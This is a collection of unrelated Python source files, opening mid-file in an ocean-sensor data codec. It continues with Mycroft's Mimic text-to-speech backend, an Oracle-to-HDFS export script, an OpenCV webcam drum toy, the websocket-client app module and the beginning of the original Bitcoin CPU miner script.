ba.extend(wzp) # WZP Values
return ba
def process_wzr(self, wzr, num_vert_ens):
"""
Range Tracking Vertical Beam data.
Data Type: Float
Rows: Number of Vertical Beam values
Columns: 1
WZR = 7.3, 7.2, 7.5
:param wzr: Range Tracking Vertical Beam data in byte array.
:param num_vert_ens: Number of Vertical beam ensembles.
:return:
"""
ba = bytearray()
ba.extend(struct.pack('i', 10)) # Indicate double
ba.extend(struct.pack('i', num_vert_ens)) # Rows - Number of Vertical ensembles
ba.extend(struct.pack("i", 1)) # Columns - 1
ba.extend(struct.pack("i", 0)) # Imaginary
ba.extend(struct.pack("i", 4)) # Name Length
for code in map(ord, 'wzr'): # Name
ba.extend([code])
ba.extend(bytearray(1))
ba.extend(wzr) # WZR Values
return ba
@staticmethod
def time_stamp_seconds(ens):
"""
Calculate the timestamp. This is the number of seconds for the given
date and time.
:param ens: Ensemble to get the timestamp.
:return: Timestamp in seconds.
"""
ts = 0.0
if ens.IsEnsembleData:
year = ens.EnsembleData.Year
month = ens.EnsembleData.Month
day = ens.EnsembleData.Day
hour = ens.EnsembleData.Hour
minute = ens.EnsembleData.Minute
second = ens.EnsembleData.Second
hsec = ens.EnsembleData.HSec
jdn = WaveForceCodec.julian_day_number(year, month, day)
ts = (24.0 * 3600.0 * jdn) + (3600.0 * hour) + (60.0 * minute) + second + (hsec / 100.0)
return ts
@staticmethod
def julian_day_number(year, month, day):
"""
Compute the Julian Day Number for the given
year, month and day.
:param year: Years.
:param month: Months.
:param day: Days.
:return: Julian Day Number.
"""
a = (14 - month) // 12
y = year + 4800 - a
m = month + 12 * a - 3
return day + (153 * m + 2) // 5 + (365 * y) + y // 4 - y // 100 + y // 400 - 32045
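# --- Illustrative sketch (not part of the codec class) ---
# Every process_* method above emits the same MATLAB-style record layout: an int32 type code
# (0 appears to mean double, 10 float, 11 a text record whose char codes are stored as floats),
# int32 rows, int32 columns, int32 imaginary flag, int32 name length (always 4: 3 chars plus a
# null byte), the 4 name bytes, then the packed payload. The lines below rebuild a hypothetical
# 1x1 double record named 'lat' the same way; 'example_lat' is an assumed value for illustration.
import struct  # already imported at the top of this module; repeated so the sketch stands alone
example_lat = 32.865
example_record = bytearray()
example_record.extend(struct.pack('i', 0))    # Type code: double
example_record.extend(struct.pack('i', 1))    # Rows
example_record.extend(struct.pack('i', 1))    # Columns
example_record.extend(struct.pack('i', 0))    # Imaginary flag
example_record.extend(struct.pack('i', 4))    # Name length (3 chars + null terminator)
example_record.extend(b'lat\x00')             # Name bytes
example_record.extend(struct.pack('d', example_lat))  # Payload, matching process_lat()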
|
mimic_tts.py
|
# Copyright 2017 Mycroft AI Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Mimic TTS, a local TTS backend.
This Backend uses the mimic executable to render text into speech.
"""
import os
import os.path
from os.path import exists, join, expanduser
import stat
import subprocess
from threading import Thread
from time import sleep
from mycroft import MYCROFT_ROOT_PATH
from mycroft.api import DeviceApi
from mycroft.configuration import Configuration
from mycroft.util.download import download
from mycroft.util.log import LOG
from .tts import TTS, TTSValidator
def get_mimic_binary():
"""Find the mimic binary, either from config or from PATH.
Returns:
(str) path of mimic executable
"""
config = Configuration.get().get("tts", {}).get("mimic")
bin_ = config.get("path",
os.path.join(MYCROFT_ROOT_PATH, 'mimic', 'bin', 'mimic'))
if not os.path.isfile(bin_):
# Search for mimic on the path
import distutils.spawn
bin_ = distutils.spawn.find_executable("mimic")
return bin_
def get_subscriber_voices():
"""Get dict of mimic voices exclusive to subscribers.
Returns:
(dict) map of voices to custom Mimic executables.
"""
data_dir = expanduser(Configuration.get()['data_dir'])
return {'trinity': join(data_dir, 'voices/mimic_tn')}
def download_subscriber_voices(selected_voice):
"""Function to download all premium voices.
The function starts with the currently selected if applicable
"""
subscriber_voices = get_subscriber_voices()
def make_executable(dest):
"""Call back function to make the downloaded file executable."""
LOG.info('Making the new voice binary executable')
# make executable
file_stat = os.stat(dest)
os.chmod(dest, file_stat.st_mode | stat.S_IEXEC)
# First download the selected voice if needed
voice_file = subscriber_voices.get(selected_voice)
if voice_file is not None and not exists(voice_file):
LOG.info('Voice doesn\'t exist, downloading')
url = DeviceApi().get_subscriber_voice_url(selected_voice)
# Check we got an url
if url:
dl_status = download(url, voice_file, make_executable)
# Wait for completion
while not dl_status.done:
sleep(1)
else:
LOG.debug('{} is not available for this architecture'
.format(selected_voice))
# Download the rest of the subscriber voices as needed
for voice in subscriber_voices:
voice_file = subscriber_voices[voice]
if not exists(voice_file):
url = DeviceApi().get_subscriber_voice_url(voice)
# Check we got an url
if url:
dl_status = download(url, voice_file, make_executable)
# Wait for completion
while not dl_status.done:
sleep(1)
else:
LOG.debug('{} is not available for this architecture'
.format(voice))
def parse_phonemes(phonemes):
"""Parse mimic phoneme string into a list of phone, duration pairs.
Arguments:
phonemes (bytes): phoneme output from mimic
Returns:
(list) list of phoneme duration pairs
"""
phon_str = phonemes.decode()
pairs = phon_str.split(' ')
return [pair.split(':') for pair in pairs if ':' in pair]
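# A minimal sketch of what parse_phonemes() consumes: mimic's -psdur output appears to be a
# byte string of space-separated "phone:duration" pairs (the sample below is made up, not
# captured from a real mimic run):
#
#     parse_phonemes(b"pau:0.150 hh:0.055 ax:0.075 l:0.132 ow:0.255")
#     # -> [['pau', '0.150'], ['hh', '0.055'], ['ax', '0.075'], ['l', '0.132'], ['ow', '0.255']]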
class Mimic(TTS):
"""TTS interface for local mimic v1."""
def __init__(self, lang, config):
super(Mimic, self).__init__(
lang, config, MimicValidator(self), 'wav',
ssml_tags=["speak", "ssml", "phoneme", "voice", "audio", "prosody"]
)
self.default_binary = get_mimic_binary()
self.clear_cache()
# Download subscriber voices if needed
self.subscriber_voices = get_subscriber_voices()
self.is_subscriber = DeviceApi().is_subscriber
if self.is_subscriber:
trd = Thread(target=download_subscriber_voices, args=[self.voice])
trd.daemon = True
trd.start()
def modify_tag(self, tag):
"""Modify the SSML to suite Mimic."""
ssml_conversions = {
'x-slow': '0.4',
'slow': '0.7',
'medium': '1.0',
'high': '1.3',
'x-high': '1.6',
'speed': 'rate'
}
for key, value in ssml_conversions.items():
tag = tag.replace(key, value)
return tag
@property
def args(self):
"""Build mimic arguments."""
subscriber_voices = self.subscriber_voices
if (self.voice in subscriber_voices and
exists(subscriber_voices[self.voice]) and self.is_subscriber):
# Use subscriber voice
mimic_bin = subscriber_voices[self.voice]
voice = self.voice
elif self.voice in subscriber_voices:
# Premium voice but the binary doesn't exist yet; use the default 'ap' voice while downloading
mimic_bin = self.default_binary
voice = 'ap'
else:
# Normal case use normal binary and selected voice
mimic_bin = self.default_binary
voice = self.voice
args = [mimic_bin, '-voice', voice, '-psdur', '-ssml']
stretch = self.config.get('duration_stretch', None)
if stretch:
args += ['--setf', 'duration_stretch={}'.format(stretch)]
return args
def get_tts(self, sentence, wav_file):
"""Generate WAV and phonemes.
Args:
sentence (str): sentence to generate audio for
wav_file (str): output file
Returns:
tuple ((str) file location, (str) generated phonemes)
"""
phonemes = subprocess.check_output(self.args + ['-o', wav_file,
'-t', sentence])
return wav_file, parse_phonemes(phonemes)
def viseme(self, phoneme_pairs):
"""Convert phoneme string to visemes.
Args:
phoneme_pairs (list): Phoneme output from mimic
Returns:
(list) list of tuples of viseme and duration
"""
visemes = []
for phon, dur in phoneme_pairs:
visemes.append((VISIMES.get(phon, '4'), float(dur)))
return visemes
class MimicValidator(TTSValidator):
"""Validator class checking that Mimic can be used."""
def validate_lang(self):
"""Verify that the language is supported."""
# TODO: Verify version of mimic can handle the requested language
def validate_connection(self):
"""Check that Mimic executable is found and works."""
mimic_bin = get_mimic_binary()
try:
subprocess.call([mimic_bin, '--version'])
except Exception as err:
if mimic_bin:
LOG.error('Failed to find mimic at: {}'.format(mimic_bin))
else:
LOG.error('Mimic executable not found')
raise Exception(
'Mimic was not found. Run install-mimic.sh to install it.') \
from err
def get_tts_class(self):
"""Return the TTS class associated with the validator."""
return Mimic
# Mapping based on Jeffers phoneme to viseme map, seen in table 1 from:
# http://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.221.6377&rep=rep1&type=pdf
#
# Mycroft unit visemes based on images found at:
# http://www.web3.lu/wp-content/uploads/2014/09/visemes.jpg
#
# Mapping was created partially based on the "12 mouth shapes visuals seen at:
# https://wolfpaulus.com/journal/software/lipsynchronization/
VISIMES = {
# /A group
'v': '5',
'f': '5',
# /B group
'uh': '2',
'w': '2',
'uw': '2',
'er': '2',
'r': '2',
'ow': '2',
# /C group
'b': '4',
'p': '4',
'm': '4',
# /D group
'aw': '1',
# /E group
'th': '3',
'dh': '3',
# /F group
'zh': '3',
'ch': '3',
'sh': '3',
'jh': '3',
# /G group
'oy': '6',
'ao': '6',
# /Hgroup
'z': '3',
's': '3',
# /I group
'ae': '0',
'eh': '0',
'ey': '0',
'ah': '0',
'ih': '0',
'y': '0',
'iy': '0',
'aa': '0',
'ay': '0',
'ax': '0',
'hh': '0',
# /J group
'n': '3',
't': '3',
'd': '3',
'l': '3',
# /K group
'g': '3',
'ng': '3',
'k': '3',
# blank mouth
'pau': '4',
}
|
main.py
|
import cx_Oracle as ora
import pandas as pd
import pyarrow as pa
import pyarrow.parquet as parquet
import uuid
import threading as th
PARTS = 10
ARRSIZE = 2000
def get_min_max(pool, table, column):
conn = pool.acquire()
cursor = conn.cursor()
minmax = """select min(t.{}), max(t.{}) from (select * from {}) t"""
minmax = minmax.format(column, column, table)
cursor.execute(minmax)
x = cursor.fetchone()
cursor.close()
pool.release(conn)
return x
def get_data(pool, query):
conn = pool.acquire()
cursor = conn.cursor()
cursor.arraysize = ARRSIZE
df = pd.read_sql_query(con=conn, sql=query)
cursor.close()
pool.release(conn)
return df
def getCotas(min, max, parts):
cant = max - min
part = int(cant / parts)
ct = []
while min < max:
lmin = min
lmax = min + part
min = lmax + 1
ct.append([lmin, lmax])
ct[-1][1] = max
return ct
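# For example, getCotas(1, 100, 4) yields inclusive, non-overlapping bounds
# [[1, 25], [26, 50], [51, 75], [76, 100]]; the final upper bound is clamped to max.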
def getPart(pool, cota):
id = str(uuid.uuid4()) + '.parquet'
conn = pool.acquire()
cursor = conn.cursor()
cursor.arraysize = ARRSIZE
qry = "select * from tickets where violationprecinct between {} and {}".format(*cota)
df = get_data(pool, qry)
table = pa.Table.from_pandas(df=df)
fs = pa.hdfs.connect(host='hdp', port=9000, user='hdfs')
with fs.open('/user/hdfs/tickets.python/'+id, 'wb') as fw:
parquet.write_table(table=table, where=fw)
cursor.close()
pool.release(conn)
if __name__ == "__main__":
dsn = ora.makedsn(host='10.0.0.2', port='1521', service_name='FISCO.matinet')
pool = ora.SessionPool(user="SPARK_METASTORE", password="SPARK_METASTORE", dsn=dsn, min=PARTS, max=100, increment=1,
encoding="UTF-8", threaded=True, getmode=ora.SPOOL_ATTRVAL_WAIT)
min1, max1 = get_min_max(pool, 'tickets', 'violationprecinct')
print("min: " + str(min1))
print("max: " + str(max1))
cotas = getCotas(min1, max1, PARTS)
threads = list()
for cota in cotas:
threads.append(th.Thread(target=getPart, args=[pool, cota]))
for x in threads:
x.start()
for x in threads:
x.join()
pool.close()
|
Drum AR Stella.py
|
import cv2
import numpy as np
import time
import pyaudio
import wave
from array import array
from struct import pack
import os
import threading
import sys
from collections import deque
from imutils.video import VideoStream
import argparse
import imutils
##Sound
'''
def drumThreadCreator(file):
drumThread = threading.Thread(target = play, args = (file,))
drumThread.start()
'''
def play(file):
CHUNK = 1024 #measured in bytes
wf = wave.open(file, 'rb')
p = pyaudio.PyAudio()
stream = p.open(format=p.get_format_from_width(wf.getsampwidth()),
channels=wf.getnchannels(),
rate=wf.getframerate(),
output=True)
data = wf.readframes(CHUNK)
while len(data) > 0:
stream.write(data)
data = wf.readframes(CHUNK)
stream.stop_stream()
stream.close()
p.terminate()
drumSounds = ["Other/snare.wav", "Other/rack tom.wav", "Other/tom.wav",
"Other/kick.wav", "Other/closed hat.wav"]
drum1Thread = threading.Thread(target = play, args = (drumSounds[0],))
drum2Thread = threading.Thread(target = play, args = (drumSounds[1],))
drum3Thread = threading.Thread(target = play, args = (drumSounds[2],))
drum4Thread = threading.Thread(target = play, args = (drumSounds[3],))
drum5Thread = threading.Thread(target = play, args = (drumSounds[4],))
drumThreads = [drum1Thread, drum2Thread, drum3Thread, drum4Thread, drum5Thread]
## Main Video Code
'''
def playDrum(i):
if i == 0:
drumThreadCreator("Other/snare.wav")
elif i == 1:
drumThreadCreator("Other/rack tom.wav")
elif i == 2:
drumThreadCreator("Other/tom.wav")
elif i == 3:
drumThreadCreator("Other/kick.wav")
elif i == 4:
drumThreadCreator("Other/closed hat.wav")
'''
def getDrum(i):
color = (0,255,0)
lineWidth = 2
radius1, radius2, radius3, radius4 = 100, 120, 140, 100
point1, point2, point3, point4, point5 = (300,550), (580,500), (820,500), (1100,550), (150,300)
cir1 = (point1,radius2,color,lineWidth)
cir2 = (point2,radius1,color,lineWidth)
cir3 = (point3,radius1,color,lineWidth)
cir4 = (point4,radius3,color,lineWidth)
cir5 = (point5,radius4,color,lineWidth)
##Change based on System Mac or Windows
drumParas = [cir1,cir2,cir3,cir4,cir5]
return drumParas[i]
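# Each entry is a (center, radius, color, line width) tuple for cv2.circle, e.g.
# getDrum(0) returns ((300, 550), 120, (0, 255, 0), 2) for the snare pad.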
def main():
hRange = (550, 650)
splitRange = 320
drumNum = 5
threshold = (10,10,10)
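# checkDrum (below) samples the masked frame on a coarse 20-pixel grid inside drum k's
# circle and reports a hit when any channel of a sampled pixel reaches the threshold above.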
def checkDrum(res, k):
point, radius, _, _ = getDrum(k)
counter = False
for line in range(point[1] - radius//2, point[1] + (radius*2//3), 20):
for char in range(point[0] - radius//2, point[0] + radius//2, 20):
for i in range(3):
if res[line][char][i] >= threshold[i]:
counter = True
return counter
#range of color
#colorLower = np.array([0, 50, 0], np.uint8)
#colorUpper = np.array([45, 100, 100], np.uint8)
colorLower = np.array([0, 120, 70], np.uint8)
colorUpper = np.array([10, 255, 255], np.uint8)
colorLower1 = np.array([170, 120, 70], np.uint8)
colorUpper1 = np.array([180, 255, 255], np.uint8)
kernal = np.ones((5,5), 'uint8')
drums = [0] * drumNum
inDrums = [False] * drumNum
cap = cv2.VideoCapture(0)
time.sleep(2.0)
drumStatus = [0] * drumNum
while(True):
for i in range(len(drums)):
if drums[i] > 0:
drums[i] -= 1
ret, frame = cap.read()
frame = cv2.resize(frame, (0,0), fx = 2, fy = 2)
#print(len(frame), len(frame[0])) #1440, 2560, 720, 1280
frame = cv2.flip(frame, +1)
blurred = cv2.GaussianBlur(frame, (11,11), 0)
frameHSV = cv2.cvtColor(blurred, cv2.COLOR_BGR2HSV)
frameHSV = cv2.erode(frameHSV, kernal, iterations = 5)
frameHSV = cv2.dilate(frameHSV, kernal, iterations = 5)
cv2.imshow("hsv", frameHSV)
colorMask0 = cv2.inRange(frameHSV, colorLower, colorUpper)
colorMask1 = cv2.inRange(frameHSV, colorLower1, colorUpper1)
colorMask = colorMask0 + colorMask1
res = cv2.bitwise_and(frame, frame, mask = colorMask)
cv2.imshow("Before",res)
gray = cv2.cvtColor(res, cv2.COLOR_BGR2GRAY)
cv2.imshow("After", res)
thresh = cv2.adaptiveThreshold(gray, 255, cv2.ADAPTIVE_THRESH_GAUSSIAN_C, cv2.THRESH_BINARY, 11, 2)
contours, hierarchy = cv2.findContours(thresh, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
count = 0
for i in contours:
count += 1
((x,y), radius) = cv2.minEnclosingCircle(i)
if radius < 20:
continue
M = cv2.moments(i)
center = (int(M["m10"] / M["m00"]), int(M["m01"] / M["m00"]))
cv2.circle(frame, (int(x), int(y)), int(radius), (0, 0, 255), 2)
cv2.circle(frame, center, 5, (0, 0, 255), -1)
for i in range(len(drums)):
timer = drums[i]
point, radius, color, lineWidth = getDrum(i)
cv2.circle(frame,point,radius,color,lineWidth)
if timer == 0:
isHit = checkDrum(res, i)
if isHit == True and inDrums[i] == False:
drumStatus[i] = 1
cv2.circle(frame,point,radius,color,-1)
drums[i] = 5
inDrums[i] = True
else:
inDrums[i] = False
for i in range(len(drumStatus)):
if drumStatus[i] == 1:
# A Thread object can only be started once, so spawn a fresh thread for every hit
threading.Thread(target = play, args = (drumSounds[i],)).start()
drumStatus[i] = 0
cv2.imshow("Hello", res)
cv2.imshow("Drum AR", frame)
#if condition is met, break out of loop
ch = cv2.waitKey(1)
if ch & 0xFF == ord('q'):
break
cap.release()
cv2.destroyAllWindows()
main()
## Tkinter
|
_app.py
|
"""
websocket - WebSocket client library for Python
Copyright (C) 2010 Hiroki Ohtani(liris)
This library is free software; you can redistribute it and/or
modify it under the terms of the GNU Lesser General Public
License as published by the Free Software Foundation; either
version 2.1 of the License, or (at your option) any later version.
This library is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
Lesser General Public License for more details.
You should have received a copy of the GNU Lesser General Public
License along with this library; if not, write to the Free Software
Foundation, Inc., 51 Franklin Street, Fifth Floor,
Boston, MA 02110-1335 USA
"""
"""
WebSocketApp provides higher level APIs.
"""
import inspect
import select
import sys
import threading
import time
import traceback
import six
from ._abnf import ABNF
from ._core import WebSocket, getdefaulttimeout
from ._exceptions import *
from . import _logging
__all__ = ["WebSocketApp"]
class Dispatcher:
def __init__(self, app, ping_timeout):
self.app = app
self.ping_timeout = ping_timeout
def read(self, sock, read_callback, check_callback):
while self.app.keep_running:
r, w, e = select.select(
(self.app.sock.sock, ), (), (), self.ping_timeout)
if r:
if not read_callback():
break
check_callback()
class SSLDispatcher:
def __init__(self, app, ping_timeout):
self.app = app
self.ping_timeout = ping_timeout
def read(self, sock, read_callback, check_callback):
while self.app.keep_running:
r = self.select()
if r:
if not read_callback():
break
check_callback()
def select(self):
sock = self.app.sock.sock
if sock.pending():
return [sock,]
r, w, e = select.select((sock, ), (), (), self.ping_timeout)
return r
class WebSocketApp(object):
"""
Higher-level APIs are provided.
The interface is similar to the JavaScript WebSocket object.
"""
def __init__(self, url, header=None,
on_open=None, on_message=None, on_error=None,
on_close=None, on_ping=None, on_pong=None,
on_cont_message=None,
keep_running=True, get_mask_key=None, cookie=None,
subprotocols=None,
on_data=None):
"""
url: websocket url.
header: custom header for websocket handshake.
on_open: callable object which is called at opening websocket.
this function has one argument. The argument is this class object.
on_message: callable object which is called when data is received.
on_message has 2 arguments.
The 1st argument is this class object.
The 2nd argument is a utf-8 string which we get from the server.
on_error: callable object which is called when an error occurs.
on_error has 2 arguments.
The 1st argument is this class object.
The 2nd argument is the exception object.
on_close: callable object which is called when the connection is closed.
this function has one argument. The argument is this class object.
on_cont_message: callback object which is called when a continuation
frame is received.
on_cont_message has 3 arguments.
The 1st argument is this class object.
The 2nd argument is a utf-8 string which we get from the server.
The 3rd argument is the continuation flag; if 0, the data continues
in the next frame.
on_data: callback object which is called when a message received.
This is called before on_message or on_cont_message,
and then on_message or on_cont_message is called.
on_data has 4 arguments.
The 1st argument is this class object.
The 2nd argument is a utf-8 string which we get from the server.
The 3rd argument is the data type: ABNF.OPCODE_TEXT or ABNF.OPCODE_BINARY.
The 4th argument is the continuation flag; if 0, the data continues
in the next frame.
keep_running: this parameter is obsolete and ignored.
get_mask_key: a callable to produce new mask keys,
see the WebSocket.set_mask_key's docstring for more information
subprotocols: array of available sub protocols. default is None.
"""
self.url = url
self.header = header if header is not None else []
self.cookie = cookie
self.on_open = on_open
self.on_message = on_message
self.on_data = on_data
self.on_error = on_error
self.on_close = on_close
self.on_ping = on_ping
self.on_pong = on_pong
self.on_cont_message = on_cont_message
self.keep_running = False
self.get_mask_key = get_mask_key
self.sock = None
self.last_ping_tm = 0
self.last_pong_tm = 0
self.subprotocols = subprotocols
def send(self, data, opcode=ABNF.OPCODE_TEXT):
"""
send message.
data: message to send. If you set opcode to OPCODE_TEXT,
data must be utf-8 string or unicode.
opcode: operation code of data. default is OPCODE_TEXT.
"""
if not self.sock or self.sock.send(data, opcode) == 0:
raise WebSocketConnectionClosedException(
"Connection is already closed.")
def close(self, **kwargs):
"""
close websocket connection.
"""
self.keep_running = False
if self.sock:
self.sock.close(**kwargs)
self.sock = None
def _send_ping(self, interval, event):
while not event.wait(interval):
self.last_ping_tm = time.time()
if self.sock:
try:
self.sock.ping()
except Exception as ex:
_logging.warning("send_ping routine terminated: {}".format(ex))
break
def run_forever(self, sockopt=None, sslopt=None,
ping_interval=0, ping_timeout=None,
http_proxy_host=None, http_proxy_port=None,
http_no_proxy=None, http_proxy_auth=None,
skip_utf8_validation=False,
host=None, origin=None, dispatcher=None,
suppress_origin=False, proxy_type=None):
"""
Run the event loop for the WebSocket framework.
This loop runs indefinitely, as long as the websocket connection is alive.
sockopt: values for socket.setsockopt.
sockopt must be tuple
and each element is argument of sock.setsockopt.
sslopt: ssl socket optional dict.
ping_interval: automatically send "ping" command
every specified period (in seconds).
If set to 0, no ping is sent automatically.
ping_timeout: timeout (in seconds) if the pong message is not received.
http_proxy_host: http proxy host name.
http_proxy_port: http proxy port. If not set, set to 80.
http_no_proxy: host names which don't use the proxy.
skip_utf8_validation: skip utf8 validation.
host: update host header.
origin: update origin header.
dispatcher: customize reading data from socket.
suppress_origin: suppress outputting origin header.
Returns
-------
False if caught KeyboardInterrupt
True if other exception was raised during a loop
"""
if ping_timeout is not None and ping_timeout <= 0:
ping_timeout = None
if ping_timeout and ping_interval and ping_interval <= ping_timeout:
raise WebSocketException("Ensure ping_interval > ping_timeout")
if not sockopt:
sockopt = []
if not sslopt:
sslopt = {}
if self.sock:
raise WebSocketException("socket is already opened")
thread = None
self.keep_running = True
self.last_ping_tm = 0
self.last_pong_tm = 0
def teardown(close_frame=None):
"""
Tears down the connection.
If close_frame is set, we will invoke the on_close handler with the
statusCode and reason from there.
"""
if thread and thread.is_alive():
event.set()
thread.join()
self.keep_running = False
if self.sock:
self.sock.close()
close_args = self._get_close_args(
close_frame.data if close_frame else None)
self._callback(self.on_close, *close_args)
self.sock = None
try:
self.sock = WebSocket(
self.get_mask_key, sockopt=sockopt, sslopt=sslopt,
fire_cont_frame=self.on_cont_message is not None,
skip_utf8_validation=skip_utf8_validation,
enable_multithread=True if ping_interval else False)
self.sock.settimeout(getdefaulttimeout())
self.sock.connect(
self.url, header=self.header, cookie=self.cookie,
http_proxy_host=http_proxy_host,
http_proxy_port=http_proxy_port, http_no_proxy=http_no_proxy,
http_proxy_auth=http_proxy_auth, subprotocols=self.subprotocols,
host=host, origin=origin, suppress_origin=suppress_origin,
proxy_type=proxy_type)
if not dispatcher:
dispatcher = self.create_dispatcher(ping_timeout)
self._callback(self.on_open)
if ping_interval:
event = threading.Event()
thread = threading.Thread(
target=self._send_ping, args=(ping_interval, event))
thread.setDaemon(True)
thread.start()
def read():
if not self.keep_running:
return teardown()
op_code, frame = self.sock.recv_data_frame(True)
if op_code == ABNF.OPCODE_CLOSE:
return teardown(frame)
elif op_code == ABNF.OPCODE_PING:
self._callback(self.on_ping, frame.data)
elif op_code == ABNF.OPCODE_PONG:
self.last_pong_tm = time.time()
self._callback(self.on_pong, frame.data)
elif op_code == ABNF.OPCODE_CONT and self.on_cont_message:
self._callback(self.on_data, frame.data,
frame.opcode, frame.fin)
self._callback(self.on_cont_message,
frame.data, frame.fin)
else:
data = frame.data
if six.PY3 and op_code == ABNF.OPCODE_TEXT:
data = data.decode("utf-8")
self._callback(self.on_data, data, frame.opcode, True)
self._callback(self.on_message, data)
return True
def check():
if (ping_timeout):
has_timeout_expired = time.time() - self.last_ping_tm > ping_timeout
has_pong_not_arrived_after_last_ping = self.last_pong_tm - self.last_ping_tm < 0
has_pong_arrived_too_late = self.last_pong_tm - self.last_ping_tm > ping_timeout
if (self.last_ping_tm
and has_timeout_expired
and (has_pong_not_arrived_after_last_ping or has_pong_arrived_too_late)):
raise WebSocketTimeoutException("ping/pong timed out")
return True
dispatcher.read(self.sock.sock, read, check)
except (Exception, KeyboardInterrupt, SystemExit) as e:
self._callback(self.on_error, e)
if isinstance(e, SystemExit):
# propagate SystemExit further
raise
teardown()
return not isinstance(e, KeyboardInterrupt)
def create_dispatcher(self, ping_timeout):
timeout = ping_timeout or 10
if self.sock.is_ssl():
return SSLDispatcher(self, timeout)
return Dispatcher(self, timeout)
def _get_close_args(self, data):
""" this functions extracts the code, reason from the close body
if they exists, and if the self.on_close except three arguments """
# if the on_close callback is "old", just return empty list
if sys.version_info < (3, 0):
if not self.on_close or len(inspect.getargspec(self.on_close).args) != 3:
return []
else:
if not self.on_close or len(inspect.getfullargspec(self.on_close).args) != 3:
return []
if data and len(data) >= 2:
code = 256 * six.byte2int(data[0:1]) + six.byte2int(data[1:2])
reason = data[2:].decode('utf-8')
return [code, reason]
return [None, None]
def _callback(self, callback, *args):
if callback:
try:
if inspect.ismethod(callback):
callback(*args)
else:
callback(self, *args)
except Exception as e:
_logging.error("error from callback {}: {}".format(callback, e))
if _logging.isEnabledForDebug():
_, _, tb = sys.exc_info()
traceback.print_tb(tb)
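# --- Minimal usage sketch (illustration only, not part of this module) ---
# A WebSocketApp is driven entirely by callbacks and run_forever(); the URL below is a
# placeholder and the lambdas stand in for real handlers.
#
#     import websocket
#
#     app = websocket.WebSocketApp(
#         "wss://example.com/socket",                        # placeholder endpoint
#         on_open=lambda ws: ws.send("hello"),
#         on_message=lambda ws, message: print(message),
#         on_error=lambda ws, error: print("error:", error),
#     )
#     # ping_interval/ping_timeout drive the Dispatcher/check() logic above.
#     app.run_forever(ping_interval=30, ping_timeout=10)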
|
pyminer.py
|
#!/usr/bin/python
#
# Copyright (c) 2011 The Bitcoin developers
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
import time
import json
import pprint
import hashlib
import struct
import re
import base64
import httplib
import sys
from multiprocessing import Process
ERR_SLEEP = 15
MAX_NONCE = 1000000L
settings = {}
pp = pprint.PrettyPrinter(indent=4)
class BitcoinRPC:
OBJID = 1
def __init__(self, host, port, username, password):
authpair = "%s:%s" % (username, password)
self.authhdr = "Basic %s" % (base64.b64encode(authpair))
self.conn = httplib.HTTPConnection(host, port, False, 30)
def rpc(self, method, params=None):
self.OBJID += 1
obj = { 'version' : '1.1',
'method' : method,
'id' : self.OBJID }
if params is None:
obj['params'] = []
else:
obj['params'] = params
self.conn.request('POST', '/', json.dumps(obj),
{ 'Authorization' : self.authhdr,
'Content-type' : 'application/json' })
resp = self.conn.getresponse()
if resp is None:
print "JSON-RPC: no response"
return None
body = resp.read()
resp_obj = json.loads(body)
if resp_obj is None:
print "JSON-RPC: cannot JSON-decode body"
return None
if 'error' in resp_obj and resp_obj['error'] != None:
return resp_obj['error']
if 'result' not in resp_obj:
print "JSON-RPC: no result in object"
return None
return resp_obj['result']
def getblockcount(self):
return self.rpc('getblockcount')
def getwork(self, data=None):
return self.rpc('getwork', data)
def uint32(x):
return x & 0xffffffffL
def bytereverse(x):
return uint32(( ((x) << 24) | (((x) << 8) & 0x00ff0000) |
(((x) >> 8) & 0x0000ff00) | ((x) >> 24) ))
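# bytereverse swaps the byte order of a 32-bit word, e.g. bytereverse(0x12345678) == 0x78563412;
# bufreverse below applies it to every 4-byte word of a buffer.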
def bufreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
word = struct.unpack('@I', in_buf[i:i+4])[0]
out_words.append(struct.pack('@I', bytereverse(word)))
return ''.join(out_words)
def wordreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
out_words.append(in_buf[i:i+4])
out_words.reverse()
return ''.join(out_words)
class Miner:
def __init__(self, id):
self.id = id
self.max_nonce = MAX_NONCE
def work(self, datastr, targetstr):
# decode work data hex string to binary
static_data = datastr.decode('hex')
static_data = bufreverse(static_data)
# the first 76b of 80b do not change
blk_hdr = static_data[:76]
# decode 256-bit target value
targetbin = targetstr.decode('hex')
targetbin = targetbin[::-1] # byte-swap and dword-swap
targetbin_str = targetbin.encode('hex')
target = long(targetbin_str, 16)
# pre-hash first 76b of block header
static_hash = hashlib.sha256()
static_hash.update(blk_hdr)
for nonce in xrange(self.max_nonce):
# encode 32-bit nonce value
nonce_bin = struct.pack("<I", nonce)
# hash final 4b, the nonce value
hash1_o = static_hash.copy()
hash1_o.update(nonce_bin)
hash1 = hash1_o.digest()
# sha256 hash of sha256 hash
hash_o = hashlib.sha256()
hash_o.update(hash1)
hash = hash_o.digest()
# quick test for winning solution: high 32 bits zero?
if hash[-4:] != '\0\0\0\0':
continue
# convert binary hash to 256-bit Python long
hash = bufreverse(hash)
hash = wordreverse(hash)
hash_str = hash.encode('hex')
l = long(hash_str, 16)
# proof-of-work test: hash < target
if l < target:
print time.asctime(), "PROOF-OF-WORK found: %064x" % (l,)
return (nonce + 1, nonce_bin)
else:
print time.asctime(), "PROOF-OF-WORK false positive %064x" % (l,)
# return (nonce + 1, nonce_bin)
return (nonce + 1, None)
def submit_work(self, rpc, original_data, nonce_bin):
nonce_bin = bufreverse(nonce_bin)
nonce = nonce_bin.encode('hex')
solution = original_data[:152] + nonce + original_data[160:256]
param_arr = [ solution ]
result = rpc.getwork(param_arr)
print time.asctime(), "--> Upstream RPC result:", result
def iterate(self, rpc):
work = rpc.getwork()
if work is None:
time.sleep(ERR_SLEEP)
return
if 'data' not in work or 'target' not in work:
time.sleep(ERR_SLEEP)
return
time_start = time.time()
